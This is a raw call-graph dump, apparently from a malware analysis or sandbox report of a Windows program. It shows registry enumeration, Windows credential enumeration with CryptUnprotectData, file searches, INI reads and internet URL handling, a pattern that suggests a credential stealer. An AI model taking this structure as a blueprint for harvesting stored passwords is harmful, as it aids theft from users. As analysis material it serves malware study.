lstrlen 11255 40e5c2 11253->11255 11256 40e5ad 11253->11256 11258 4018b8 LocalFree 11255->11258 11257 404351 30 API calls 11256->11257 11257->11255 11259 40e5ca 11258->11259 11259->10266 11260->11253 11274 40c107 11261->11274 11264 40c107 35 API calls 11265 40c16e 11264->11265 11266 40c107 35 API calls 11265->11266 11267 40c185 11266->11267 11268 40c107 35 API calls 11267->11268 11269 40c19c 11268->11269 11270 40c107 35 API calls 11269->11270 11271 40c1b3 11270->11271 11275 401eb1 7 API calls 11274->11275 11276 40c112 11275->11276 11277 40c139 11276->11277 11278 401e4c 6 API calls 11276->11278 11277->11264 11279 40c11f 11278->11279 11280 4041a6 30 API calls 11279->11280 11281 40c134 11280->11281 11282 4018b8 LocalFree 11281->11282 11282->11277 11284 4063c8 11283->11284 11290 406207 11283->11290 11284->10282 11285 40620e RegEnumKeyExA 11286 406237 RegCloseKey 11285->11286 11285->11290 11286->11284 11288 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11288->11290 11289 401d71 6 API calls 11289->11290 11290->11285 11290->11288 11290->11289 11291 4015cb lstrlen 11290->11291 11292 4018b8 LocalFree 11290->11292 11293 4061e4 11 API calls 11290->11293 11291->11290 11292->11290 11293->11290 11295 406147 11294->11295 11301 405f6f 11294->11301 11295->10293 11296 405f76 RegEnumKeyExA 11297 405f9f RegCloseKey 11296->11297 11296->11301 11297->11295 11299 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11299->11301 11300 401d71 6 API calls 11300->11301 11301->11296 11301->11299 11301->11300 11302 4018b8 LocalFree 11301->11302 11303 4015cb lstrlen 11301->11303 11302->11301 11303->11301 11349 405844 11304->11349 11350 401d71 6 API calls 11349->11350 11351 40585d 11350->11351 11352 401d71 6 API calls 11351->11352 11353 405873 11352->11353 11354 401d71 6 API calls 11353->11354 11355 405889 11354->11355 11356 401d71 6 API calls 11355->11356 11357 4058a1 11356->11357 11358 401d71 6 API calls 11357->11358 11359 4058b7 11358->11359 11360 401d71 6 API calls 11359->11360 11385 4015fb 11384->11385 11385->10331 11387 404e92 11386->11387 11389 404e8d 11386->11389 11388 4018b8 LocalFree 11387->11388 11390 404ffb 11388->11390 11389->11387 11391 404eb2 11389->11391 11392 404ea3 11389->11392 11390->10354 11394 401df8 5 API calls 11391->11394 11393 401df8 5 API calls 11392->11393 11395 404eb0 11393->11395 11394->11395 11396 404ed6 FindFirstFileA 11395->11396 11396->11387 11415 401eb1 7 API calls 11414->11415 11416 405014 11415->11416 11417 401df8 5 API calls 11416->11417 11423 40502f 11416->11423 11419 405026 11417->11419 11418 404e73 31 API calls 11420 40503f 11418->11420 11421 4018b8 LocalFree 11419->11421 11422 4018b8 LocalFree 11420->11422 11421->11423 11423->11418 11438 404351 30 API calls 11437->11438 11439 405c84 11438->11439 11440 404351 30 API calls 11439->11440 11441 405c99 11440->11441 11443 40e254 11442->11443 11444 40e37c 11442->11444 11445 401d71 6 API calls 11443->11445 11444->10414 11446 40e266 11445->11446 11447 401d71 6 API calls 11446->11447 11448 40e27b 11447->11448 11449 401d71 6 API calls 11448->11449 11450 40e292 11449->11450 11451 401d71 6 API calls 11450->11451 11452 40e2a7 11451->11452 11453 401d71 6 API calls 11452->11453 11456 40e2bc 11453->11456 11454 40e34c 11456->11454 11460 4043dc 2 API calls 11456->11460 11476 40e445 11475->11476 11480 40e3a0 11475->11480 11476->10418 11477 40e3a7 RegEnumValueA 11478 40e3d5 RegCloseKey 11477->11478 11477->11480 11478->11476 11480->11477 11481 401d71 6 API calls 11480->11481 11482 40e402 StrStrIA 11480->11482 11484 4018b8 LocalFree 11480->11484 11485 40e0fe 11480->11485 11481->11480 11482->11480 11484->11480 11486 401f36 2 API calls 11485->11486 11487 40e10d 11486->11487 11488 40e111 11487->11488 11489 401ffd 7 API calls 11487->11489 11488->11480 11490 40e122 11489->11490 11501 40e230 11490->11501 11505 4018cf LocalAlloc 11490->11505 11495 40e132 11501->11480 11505->11495 11507 401eb1 7 API calls 11506->11507 11508 405df3 11507->11508 11509 405e45 11508->11509 11510 401e4c 6 API calls 11508->11510 11509->10424 11511 405e02 11510->11511 11512 404351 30 API calls 11511->11512 11513 405e18 11512->11513 11514 404351 30 API calls 11513->11514 11515 405e2c 11514->11515 11516 404351 30 API calls 11515->11516 11517 405e40 11516->11517 11518 4018b8 LocalFree 11517->11518 11518->11509 11543 4018cf LocalAlloc 11519->11543 11521 40ea0c RegOpenKeyA 11522 40eb34 11521->11522 11533 40ea29 11521->11533 11524 4018b8 LocalFree 11522->11524 11523 40ea30 RegEnumKeyExA 11526 40ea59 RegCloseKey 11523->11526 11523->11533 11525 40eb3f 11524->11525 11525->10440 11526->11522 11528 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11528->11533 11529 401d71 6 API calls 11529->11533 11530 401df8 5 API calls 11532 40eaba GetPrivateProfileStringA 11530->11532 11531 40e9f9 34 API calls 11531->11533 11532->11533 11533->11523 11533->11528 11533->11529 11533->11530 11533->11531 11534 4018b8 LocalFree 11533->11534 11535 404351 30 API calls 11533->11535 11534->11533 11535->11533 11544 40436b 11536->11544 11543->11521 11545 401eb1 7 API calls 11544->11545 11546 404376 11545->11546 11547 404398 11546->11547 11548 401e4c 6 API calls 11546->11548 11554 401eb1 7 API calls 11553->11554 11555 408c2c 11554->11555 11556 408c3f 11555->11556 11583 408ae5 11555->11583 11556->10448 11559 4018b8 LocalFree 11559->11556 11561 408980 11560->11561 11563 40897b 11560->11563 11563->11561 11584 408b04 11583->11584 11585 408aff 11583->11585 11586 4018b8 LocalFree 11584->11586 11585->11584 11587 401df8 5 API calls 11585->11587 11588 408c1d 11586->11588 11589 408b16 11587->11589 11588->11559 11590 408b2d FindFirstFileA 11589->11590 11590->11584 11596 408b4c 11590->11596 11591 408bed FindNextFileA 11593 408c07 FindClose 11591->11593 11591->11596 11592 408b5e lstrcmpiA 11594 408b78 lstrcmpiA 11592->11594 11592->11596 11593->11584 11594->11596 11595 401df8 5 API calls 11595->11596 11596->11591 11596->11592 11596->11595 11597 401e4c 6 API calls 11596->11597 11598 408bba StrStrIA 11597->11598 11599 408bd5 11598->11599 11600 408be8 11598->11600 11601 408961 38 API calls 11599->11601 11602 4018b8 LocalFree 11600->11602 11601->11600 11602->11591 11685 401eb1 7 API calls 11684->11685 11686 405328 11685->11686 11687 4053bf 11686->11687 11688 401df8 5 API calls 11686->11688 11687->10484 11689 405340 11688->11689 11690 4051e3 29 API calls 11689->11690 11691 40534f 11690->11691 11692 4018b8 LocalFree 11691->11692 11693 405354 11692->11693 11694 401df8 5 API calls 11693->11694 11695 405361 11694->11695 11696 4051e3 29 API calls 11695->11696 11714 401d71 6 API calls 11713->11714 11719 4051fd 11718->11719 11720 405202 11718->11720 11719->11720 11722 401df8 5 API calls 11719->11722 11721 4018b8 LocalFree 11720->11721 11723 405316 11721->11723 11724 405212 11722->11724 11723->10480 11742 405182 11724->11742 11727 4018b8 LocalFree 11728 405221 11727->11728 11729 401df8 5 API calls 11728->11729 11730 40522e 11729->11730 11731 405245 FindFirstFileA 11730->11731 11731->11720 11732 405264 11731->11732 11743 40406c 16 API calls 11742->11743 11744 405195 11743->11744 11744->11727 11746 40f6fd 11745->11746 11748 40f717 11745->11748 11746->11748 11769 40a45e 11746->11769 11749 40f30d RegOpenKeyA 11748->11749 11750 40f3a8 11749->11750 11758 40f329 11749->11758 11750->10520 11751 40f330 RegEnumKeyExA 11752 40f359 RegCloseKey 11751->11752 11751->11758 11752->11750 11754 401df8 5 API calls 11754->11758 11755 401e4c 6 API calls 11755->11758 11757 4018b8 LocalFree 11757->11758 11758->11751 11758->11754 11758->11755 11758->11757 11782 40f178 11758->11782 11760 40f452 11759->11760 11768 40f3cc 11759->11768 11760->10524 11761 40f3d3 RegEnumKeyExA 11762 40f3fc RegCloseKey 11761->11762 11761->11768 11762->11760 11764 401df8 5 API calls 11764->11768 11765 401e4c 6 API calls 11765->11768 11766 40f30d 23 API calls 11766->11768 11767 4018b8 LocalFree 11767->11768 11768->11761 11768->11764 11768->11765 11768->11766 11768->11767 11770 40a47e 11769->11770 11771 40a4d3 11770->11771 11773 40a3c8 11770->11773 11771->11748 11775 40a3eb 11773->11775 11774 40a448 11774->11770 11775->11774 11777 40a342 11775->11777 11778 40a34f 11777->11778 11780 40a354 11777->11780 11778->11775 11779 40a3b8 11779->11775 11780->11779 11781 40a3a7 757283B0 11780->11781 11781->11780 11784 40f188 11782->11784 11783 401d71 6 API calls 11783->11784 11784->11783 11786 4018b8 LocalFree 11784->11786 11788 40f1c4 11784->11788 11801 40f12e 11784->11801 11786->11784 11787 401d71 6 API calls 11787->11788 11788->11787 11789 40f21b 11788->11789 11790 4015cb lstrlen 11788->11790 11792 4018b8 LocalFree 11788->11792 11791 401d71 6 API calls 11789->11791 11793 4018b8 LocalFree 11789->11793 11795 4043dc 2 API calls 11789->11795 11797 40f12e 6 API calls 11789->11797 11799 40f29c 11789->11799 11790->11788 11791->11789 11792->11788 11793->11789 11794 401d71 6 API calls 11794->11799 11795->11789 11796 40f2f3 11796->11758 11797->11789 11798 4015cb lstrlen 11798->11799 11799->11794 11799->11796 11799->11798 11800 4018b8 LocalFree 11799->11800 11800->11799 11802 402abb 5 API calls 11801->11802 11803 40f13f 11802->11803 11804 4015cb lstrlen 11803->11804 11809 40f16f 11803->11809 11805 40f15c 11804->11805 11806 4015cb lstrlen 11805->11806 11807 40f167 11806->11807 11809->11784 11811 408e09 11810->11811 11816 408d3e 11810->11816 11811->10546 11812 408d45 RegEnumKeyExA 11813 408d6e RegCloseKey 11812->11813 11812->11816 11813->11811 11815 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11815->11816 11816->11812 11816->11815 11817 401d71 6 API calls 11816->11817 11819 4018b8 LocalFree 11816->11819 11820 408d1e 11 API calls 11816->11820 11836 404043 11816->11836 11817->11816 11819->11816 11820->11816 11822 408f4b 11821->11822 11831 408e2d 11821->11831 11822->10550 11823 408e34 RegEnumKeyExA 11824 408e5d RegCloseKey 11823->11824 11823->11831 11824->11822 11826 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11826->11831 11827 401d71 6 API calls 11827->11831 11828 40242b 9 API calls 11828->11831 11829 4018b8 LocalFree 11829->11831 11830 401f7e GetFileAttributesA 11833 408eb1 11830->11833 11831->11823 11831->11826 11831->11827 11831->11828 11831->11829 11832 408e0d 39 API calls 11831->11832 11831->11833 11832->11831 11833->11830 11834 4018b8 LocalFree 11833->11834 11835 404351 30 API calls 11833->11835 11834->11831 11835->11833 11837 404068 11836->11837 11838 40404c 11836->11838 11837->11816 11838->11837 11839 4015cb lstrlen 11838->11839 11839->11837 11840->10563 11841->10571 11843 401d71 6 API calls 11842->11843 11844 40e878 11843->11844 11845 40e897 11844->11845 11849 40e811 11844->11849 11845->10577 11848 4018b8 LocalFree 11848->11845 11856 40e7db 11849->11856 11852 40e7db 35 API calls 11853 40e842 11852->11853 11854 40e7db 35 API calls 11853->11854 11855 40e859 11854->11855 11855->11848 11857 401eb1 7 API calls 11856->11857 11858 40e7e6 11857->11858 11859 40e80d 11858->11859 11860 401e4c 6 API calls 11858->11860 11859->11852 11861 40e7f3 11860->11861 11862 4041a6 30 API calls 11861->11862 11863 40e808 11862->11863 11864 4018b8 LocalFree 11863->11864 11864->11859 11866 40eeaa 11865->11866 11872 40ebc3 11865->11872 11866->10598 11867 40ebca RegEnumKeyExA 11868 40ebf3 RegCloseKey 11867->11868 11867->11872 11868->11866 11870 401df8 5 API calls 11870->11872 11871 401e4c 6 API calls 11871->11872 11872->11867 11872->11870 11872->11871 11873 401d71 6 API calls 11872->11873 11874 40eba3 15 API calls 11872->11874 11875 4015cb lstrlen 11872->11875 11876 4018b8 LocalFree 11872->11876 11873->11872 11874->11872 11875->11872 11876->11872 11878 40a944 11877->11878 11881 40a89a 11877->11881 11879 40a712 17 API calls 11878->11879 11880 40a969 11879->11880 11886 40a96d 11880->11886 11881->11878 11882 40a8fc StrStrIW 11881->11882 11895 40a712 lstrlenW 11881->11895 11882->11881 11884 40a92c 757283B0 11884->11881 11885 40a93a 757283B0 11884->11885 11885->11881 11887 40a97d 11886->11887 11888 40aaa3 11887->11888 11889 40a9c2 CredEnumerateA 11887->11889 11888->10605 11889->11888 11892 40a9ed 11889->11892 11890 40aa9a CredFree 11890->11888 11891 40aa09 lstrlenW CryptUnprotectData 11891->11892 11892->11888 11892->11890 11892->11891 11893 40aa7c LocalFree 11892->11893 11915 40a522 11892->11915 11893->11892 11896 40a725 11895->11896 11901 40a72a 11895->11901 11896->11884 11897 40a788 wsprintfA 11900 401e4c 6 API calls 11897->11900 11898 40a75b wsprintfA 11899 401e4c 6 API calls 11898->11899 11899->11901 11902 40a7af 11900->11902 11901->11897 11901->11898 11903 401d71 6 API calls 11902->11903 11904 40a7c9 11903->11904 11905 40a868 11904->11905 11906 40a860 11904->11906 11907 40a7de lstrlenW 11904->11907 11908 4018b8 LocalFree 11905->11908 11910 4018b8 LocalFree 11906->11910 11907->11906 11909 40a810 CryptUnprotectData 11907->11909 11911 40a870 11908->11911 11909->11906 11912 40a82e 11909->11912 11910->11905 11911->11884 11912->11906 11916 401569 11915->11916 11917 40a530 lstrlen 11916->11917 11918 40a545 11917->11918 11918->11893 11920 408120 11919->11920 11925 407f2c 11919->11925 11920->10616 11921 407f33 RegEnumKeyExA 11922 407f5c RegCloseKey 11921->11922 11921->11925 11922->11920 11924 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11924->11925 11925->11921 11925->11924 11926 401d71 6 API calls 11925->11926 11927 4018b8 LocalFree 11925->11927 11928 407f0c 11 API calls 11925->11928 11929 4015cb lstrlen 11925->11929 11926->11925 11927->11925 11928->11925 11929->11925 11931 401eb1 7 API calls 11930->11931 11932 40d970 11931->11932 11933 40d99d 11932->11933 11934 401e4c 6 API calls 11932->11934 11933->10666 11935 40d97f 11934->11935 11936 4041a6 30 API calls 11935->11936 11937 40d998 11936->11937 11938 4018b8 LocalFree 11937->11938 11938->11933 11940 407e1c 11939->11940 11946 407bda 11939->11946 11940->10680 11941 407be1 RegEnumKeyExA 11942 407c0a RegCloseKey 11941->11942 11941->11946 11942->11940 11944 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11944->11946 11945 401d71 6 API calls 11945->11946 11946->11941 11946->11944 11946->11945 11947 4018b8 LocalFree 11946->11947 11948 4015cb lstrlen 11946->11948 11949 407bba 11 API calls 11946->11949 11947->11946 11948->11946 11949->11946 11951 401eb1 7 API calls 11950->11951 11952 408fde 11951->11952 11953 40901b 11952->11953 11954 401e4c 6 API calls 11952->11954 11953->10686 11955 408fed 11954->11955 11956 404351 30 API calls 11955->11956 11957 409002 11956->11957 11958 404351 30 API calls 11957->11958 11959 409016 11958->11959 11960 4018b8 LocalFree 11959->11960 11960->11953 11962 40cd66 11961->11962 11963 40ccea 11961->11963 11962->10702 11963->11962 11964 40ccfc CredEnumerateA 11963->11964 11964->11962 11965 40cd23 11964->11965 11965->11962 11966 40cd5d CredFree 11965->11966 11968 40cc29 11965->11968 11966->11962 11969 40cc3c 11968->11969 11970 4015cb lstrlen 11969->11970 11971 40cc47 11970->11971 11972 4015cb lstrlen 11971->11972 11973 40cc52 11972->11973 11974 40cc60 StrStrIA 11973->11974 11975 40cc71 lstrlen StrStrIA 11974->11975 11980 40ccbd 11974->11980 11976 40cc8f 11975->11976 11980->11965 11982 40de97 11981->11982 11989 40dc82 11981->11989 11982->10712 11983 40dc89 RegEnumKeyExA 11984 40dcb2 RegCloseKey 11983->11984 11983->11989 11984->11982 11986 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11986->11989 11987 401d71 6 API calls 11987->11989 11988 40dc62 11 API calls 11988->11989 11989->11983 11989->11986 11989->11987 11989->11988 11990 4018b8 LocalFree 11989->11990 11991 4015cb lstrlen 11989->11991 11990->11989 11991->11989 11993 40d792 11992->11993 12002 40d5e3 11992->12002 11993->10721 11994 40d5ea RegEnumKeyExA 11995 40d613 RegCloseKey 11994->11995 11994->12002 11995->11993 11997 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 11997->12002 11998 401d71 6 API calls 11998->12002 11999 40d5c0 11 API calls 11999->12002 12000 4018b8 LocalFree 12000->12002 12001 4015cb lstrlen 12001->12002 12002->11994 12002->11997 12002->11998 12002->11999 12002->12000 12002->12001 12004 406911 12003->12004 12013 4066b2 12003->12013 12004->10743 12005 4066b9 RegEnumKeyExA 12006 4066e2 RegCloseKey 12005->12006 12005->12013 12006->12004 12008 401df8 5 API calls 12008->12013 12009 401e4c 6 API calls 12009->12013 12010 401d71 6 API calls 12010->12013 12011 4043dc 2 API calls 12011->12013 12012 4018b8 LocalFree 12012->12013 12013->12005 12013->12008 12013->12009 12013->12010 12013->12011 12013->12012 12014 4015cb lstrlen 12013->12014 12014->12013 12016 404a91 12015->12016 12022 40493e 12015->12022 12016->10750 12017 404945 RegEnumKeyExA 12018 40496e RegCloseKey 12017->12018 12017->12022 12018->12016 12020 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12020->12022 12021 401d71 6 API calls 12021->12022 12022->12017 12022->12020 12022->12021 12023 40491b 11 API calls 12022->12023 12024 4018b8 LocalFree 12022->12024 12025 4015cb lstrlen 12022->12025 12023->12022 12024->12022 12025->12022 12027 404917 12026->12027 12033 404830 12026->12033 12027->10756 12028 404837 RegEnumValueA 12029 404865 RegCloseKey 12028->12029 12028->12033 12029->12027 12031 404881 StrStrIA 12031->12033 12032 401d71 6 API calls 12032->12033 12033->12028 12033->12031 12033->12032 12034 4018b8 LocalFree 12033->12034 12034->12033 12036 401d71 6 API calls 12035->12036 12038 40ef86 12036->12038 12037 40efa0 12040 401d71 6 API calls 12037->12040 12038->12037 12063 40eef7 12038->12063 12064 404351 30 API calls 12063->12064 12077 40b00e 12076->12077 12082 40aefa 12076->12082 12077->10781 12078 40af01 RegEnumKeyExA 12079 40af2a RegCloseKey 12078->12079 12078->12082 12079->12077 12081 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12081->12082 12082->12078 12082->12081 12083 401d71 6 API calls 12082->12083 12084 4018b8 LocalFree 12082->12084 12085 40aed7 21 API calls 12082->12085 12087 40ac3e 12082->12087 12083->12082 12084->12082 12085->12082 12150 4018cf LocalAlloc 12087->12150 12089 40ac4e 12151 4018cf LocalAlloc 12089->12151 12091 40ac5b 12152 4018cf LocalAlloc 12091->12152 12093 40ac68 12153 4018cf LocalAlloc 12093->12153 12095 40ac75 12154 4018cf LocalAlloc 12095->12154 12097 40ac82 12150->12089 12151->12091 12152->12093 12153->12095 12154->12097 12165 407585 12164->12165 12172 4073c7 12164->12172 12165->10804 12166 4073ce RegEnumKeyExA 12167 4073f7 RegCloseKey 12166->12167 12166->12172 12167->12165 12169 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12169->12172 12170 401d71 6 API calls 12170->12172 12171 4015cb lstrlen 12171->12172 12172->12166 12172->12169 12172->12170 12172->12171 12173 4073a7 11 API calls 12172->12173 12174 4018b8 LocalFree 12172->12174 12173->12172 12174->12172 12176 406f3f 12175->12176 12185 406d72 12175->12185 12176->10844 12177 406d79 RegEnumKeyExA 12178 406da2 RegCloseKey 12177->12178 12177->12185 12178->12176 12180 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12180->12185 12181 401d71 6 API calls 12181->12185 12182 4018b8 LocalFree 12182->12185 12183 4043dc 2 API calls 12183->12185 12184 4015cb lstrlen 12184->12185 12185->12177 12185->12180 12185->12181 12185->12182 12185->12183 12185->12184 12187 401f36 2 API calls 12186->12187 12213 407681 12212->12213 12219 4075f2 12212->12219 12213->10886 12214 4075f9 RegEnumValueA 12215 407622 RegCloseKey 12214->12215 12214->12219 12215->12213 12216 401d71 6 API calls 12216->12219 12218 4018b8 LocalFree 12218->12219 12219->12214 12219->12216 12219->12218 12221 401eb1 7 API calls 12220->12221 12222 407a3e 12221->12222 12223 407a7b 12222->12223 12224 401e4c 6 API calls 12222->12224 12223->10914 12225 407a4d 12224->12225 12226 404351 30 API calls 12225->12226 12227 407a62 12226->12227 12228 404351 30 API calls 12227->12228 12229 407a76 12228->12229 12230 4018b8 LocalFree 12229->12230 12230->12223 12232 407a2f 12231->12232 12237 4078e8 12231->12237 12232->10923 12233 4078ef RegEnumKeyExA 12234 407918 RegCloseKey 12233->12234 12233->12237 12234->12232 12236 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12236->12237 12237->12233 12237->12236 12238 401d71 6 API calls 12237->12238 12239 404351 30 API calls 12237->12239 12240 4018b8 LocalFree 12237->12240 12241 4078c8 34 API calls 12237->12241 12238->12237 12239->12237 12240->12237 12241->12237 12243 4044c8 12242->12243 12244 40448a GetProcAddress 12242->12244 12243->10939 12244->12243 12245 404499 GetProcAddress 12244->12245 12245->12243 12246 4044aa GetCurrentProcess 12245->12246 12247 4044b8 12246->12247 12247->10939 12247->12243 12248->10941 12250 4015ad 12249->12250 12250->10943 12252 4044e1 12251->12252 12253 4044f3 12251->12253 12252->12253 12291 401eb1 7 API calls 12290->12291 12292 40c68a 12291->12292 12293 40c6b7 12292->12293 12294 401e4c 6 API calls 12292->12294 12295 401eb1 7 API calls 12293->12295 12296 40c699 12294->12296 12297 40c6bf 12295->12297 12298 4041a6 30 API calls 12296->12298 12299 40c6ec 12297->12299 12301 401e4c 6 API calls 12297->12301 12300 40c6b2 12298->12300 12299->10978 12302 4018b8 LocalFree 12300->12302 12303 40c6ce 12301->12303 12302->12293 12304 4041a6 30 API calls 12303->12304 12305 40c6e7 12304->12305 12306 4018b8 LocalFree 12305->12306 12306->12299 12308 401d71 6 API calls 12307->12308 12309 4054de 12308->12309 12310 40553e 12309->12310 12311 401df8 5 API calls 12309->12311 12310->10990 12312 4054f2 12311->12312 12335 4054a5 12312->12335 12315 401df8 5 API calls 12316 40550d 12315->12316 12317 4054a5 16 API calls 12316->12317 12318 40551b 12317->12318 12319 401df8 5 API calls 12318->12319 12320 405528 12319->12320 12336 4054c4 12335->12336 12337 4054ae 12335->12337 12336->12315 12338 40406c 16 API calls 12337->12338 12339 4054bc 12338->12339 12340 4018b8 LocalFree 12339->12340 12340->12336 12355 401eb1 7 API calls 12354->12355 12356 40c73d 12355->12356 12357 40c765 12356->12357 12358 401e4c 6 API calls 12356->12358 12357->11044 12359 40c74c 12358->12359 12360 404351 30 API calls 12359->12360 12361 40c760 12360->12361 12362 4018b8 LocalFree 12361->12362 12362->12357 12364 406cdf 12363->12364 12369 406b3e 12363->12369 12364->11061 12365 406b45 RegEnumKeyExA 12366 406b6e RegCloseKey 12365->12366 12365->12369 12366->12364 12367 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12367->12369 12369->12365 12369->12367 12370 401d71 6 API calls 12369->12370 12371 4018b8 LocalFree 12369->12371 12372 4015cb lstrlen 12369->12372 12370->12369 12371->12369 12372->12369 12374 40735a 12373->12374 12380 40719c 12373->12380 12374->11080 12375 4071a3 RegEnumKeyExA 12376 4071cc RegCloseKey 12375->12376 12375->12380 12376->12374 12378 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12378->12380 12379 401d71 6 API calls 12379->12380 12380->12375 12380->12378 12380->12379 12381 4018b8 LocalFree 12380->12381 12382 40717c 11 API calls 12380->12382 12383 4015cb lstrlen 12380->12383 12381->12380 12382->12380 12383->12380 12385 40665a 12384->12385 12392 406420 12384->12392 12385->11085 12386 406427 RegEnumKeyExA 12387 406450 RegCloseKey 12386->12387 12386->12392 12387->12385 12389 401df8 5 API calls 12389->12392 12390 401e4c 6 API calls 12390->12392 12391 401d71 6 API calls 12391->12392 12392->12386 12392->12389 12392->12390 12392->12391 12393 4018b8 LocalFree 12392->12393 12394 4015cb lstrlen 12392->12394 12393->12392 12394->12392 12396 40dbda 12395->12396 12403 40da1a 12395->12403 12396->11090 12397 40da21 RegEnumKeyExA 12398 40da4a RegCloseKey 12397->12398 12397->12403 12398->12396 12400 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12400->12403 12401 401d71 6 API calls 12401->12403 12402 40d9fa 11 API calls 12402->12403 12403->12397 12403->12400 12403->12401 12403->12402 12404 4015cb lstrlen 12403->12404 12405 4018b8 LocalFree 12403->12405 12404->12403 12405->12403 12407 40d2c7 12406->12407 12413 40d092 12406->12413 12407->11108 12408 40d099 RegEnumKeyExA 12409 40d0c2 RegCloseKey 12408->12409 12408->12413 12409->12407 12411 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 12411->12413 12412 401d71 6 API calls 12412->12413 12413->12408 12413->12411 12413->12412 12414 4043dc 2 API calls 12413->12414 12415 4018b8 LocalFree 12413->12415 12416 40d072 13 API calls 12413->12416 12417 4015cb lstrlen 12413->12417 12414->12413 12415->12413 12416->12413 12417->12413 12419 401d71 6 API calls 12418->12419 12425 40d2e7 12419->12425 12420 40d356 12420->11112 12421 40d351 12422 4018b8 LocalFree 12421->12422 12422->12420 12423 40d309 wsprintfA 12424 401d71 6 API calls 12423->12424 12424->12425 12425->12420 12425->12421 12425->12423 12426 40406c 16 API calls 12425->12426 12427 4018b8 LocalFree 12425->12427 12426->12425 12427->12425 12429 401d71 6 API calls 12428->12429 12430 405ea5 12429->12430 12431 405ebe 12430->12431 12433 404351 30 API calls 12430->12433 12432 401d71 6 API calls 12431->12432 12435 405ed4 12432->12435 12434 405eb9 12433->12434 12437 4018b8 LocalFree 12434->12437 12436 405eed 12435->12436 12438 404351 30 API calls 12435->12438 12439 40439c 35 API calls 12436->12439 12437->12431 12440 405ee8 12438->12440 12441 405f00 12439->12441 12442 4018b8 LocalFree 12440->12442 12441->11141 12442->12436 12444 401eb1 7 API calls 12443->12444 12445 4076fe 12444->12445 12446 407750 12445->12446 12447 401e4c 6 API calls 12445->12447 12446->11147 12448 40770d 12447->12448 12449 404351 30 API calls 12448->12449 12450 407723 12449->12450 12451 404351 30 API calls 12450->12451 12452 407737 12451->12452 12453 404351 30 API calls 12452->12453 12454 40774b 12453->12454 12455 4018b8 LocalFree 12454->12455 12455->12446 12457 401eb1 7 API calls 12456->12457 12458 4077a4 12457->12458 12459 40784f 12458->12459 12460 4077c0 12458->12460 12461 401e4c 6 API calls 12458->12461 12459->11155 12462 401df8 5 API calls 12460->12462 12461->12460 12463 4077d0 12462->12463 12464 40406c 16 API calls 12463->12464 12465 4077df 12464->12465 12466 4018b8 LocalFree 12465->12466 12467 4077e4 12466->12467 12468 401df8 5 API calls 12467->12468 12469 4077f1 12468->12469 12470 40406c 16 API calls 12469->12470 12487->11176 12489 404c4d 12488->12489 12491 404b2b 12488->12491 12489->11181 12490 404b44 12493 401d71 6 API calls 12490->12493 12491->12490 12492 401e4c 6 API calls 12491->12492 12492->12490 12494 404b5e 12493->12494 12495 404b80 12494->12495 12496 401df8 5 API calls 12494->12496 12497 401d71 6 API calls 12495->12497 12498 404b6c 12496->12498 12499 404b96 12497->12499 12500 404b07 16 API calls 12498->12500 12501 404bb8 12499->12501 12504 401df8 5 API calls 12499->12504 12502 404b76 12500->12502 9065 40fd78 9075 403ffb WSAStartup 9065->9075 9067 40fe61 9068 40fe4d 9068->9067 9095 4026dd RegCreateKeyA 9068->9095 9071 40fe2c Sleep 9072 40fd7d 9071->9072 9072->9067 9072->9068 9072->9071 9074 40fb14 6 API calls 9072->9074 9076 403f97 9072->9076 9085 401bc0 756D19A0 9072->9085 9074->9072 9075->9072 9077 403fa6 9076->9077 9080 403fec 9076->9080 9078 403fac 756D19A0 9077->9078 9077->9080 9079 403fbc 9078->9079 9078->9080 9081 403fc4 GlobalFix 9079->9081 9080->9072 9081->9080 9082 403fd3 9081->9082 9120 403de5 9082->9120 9086 401be0 9085->9086 9087 401c7e 9085->9087 9086->9087 9088 401bf5 GlobalFix 9086->9088 9087->9072 9088->9087 9089 401c01 9088->9089 9204 4018cf LocalAlloc 9089->9204 9091 401c0c 9092 401c1d GlobalUnWire 9091->9092 9093 401c36 9092->9093 9094 4018b8 LocalFree 9093->9094 9094->9087 9096 402701 RegSetValueExA 9095->9096 9097 402723 9095->9097 9098 40271a 9096->9098 9099 40271b RegCloseKey 9096->9099 9100 4027f0 9097->9100 9101 40272b GetTempPathA 9097->9101 9098->9099 9099->9097 9100->9067 9101->9100 9102 402744 9101->9102 9102->9100 9103 40274f CreateDirectoryA 9102->9103 9104 402769 9103->9104 9105 402789 9104->9105 9106 40276d 9104->9106 9108 401df8 5 API calls 9105->9108 9205 401df8 9106->9205 9110 402798 ExitProcess 9108->9110 9109 40277e 9210 401e4c 9109->9210 9112 4027d6 9110->9112 9113 4027be 9110->9113 9116 4027e5 9112->9116 9117 4027da DeleteFileA 9112->9117 9115 401422 WriteFile 9113->9115 9118 4027cc CloseHandle 9115->9118 9119 4018b8 LocalFree 9116->9119 9117->9116 9118->9112 9119->9100 9152 4018cf LocalAlloc 9120->9152 9122 403e00 9153 4018cf LocalAlloc 9122->9153 9124 403e0d 9154 4018cf LocalAlloc 9124->9154 9126 403e1a InternetCrackUrlA 9127 403e61 9126->9127 9128 403e67 9126->9128 9127->9128 9129 403e6c InternetCreateUrlA 9127->9129 9131 4018b8 LocalFree 9128->9131 9129->9128 9130 403e91 InternetCrackUrlA 9129->9130 9130->9128 9132 403ed2 9130->9132 9133 403f71 9131->9133 9132->9128 9134 403edd wsprintfA 9132->9134 9135 4018b8 LocalFree 9133->9135 9137 403f79 9135->9137 9152->9122 9153->9124 9154->9126 9204->9091 9206 401e02 lstrlen lstrlen 9205->9206 9218 4018cf LocalAlloc 9206->9218 9209 401e31 lstrcpy lstrcat 9209->9109 9211 401e56 lstrlen 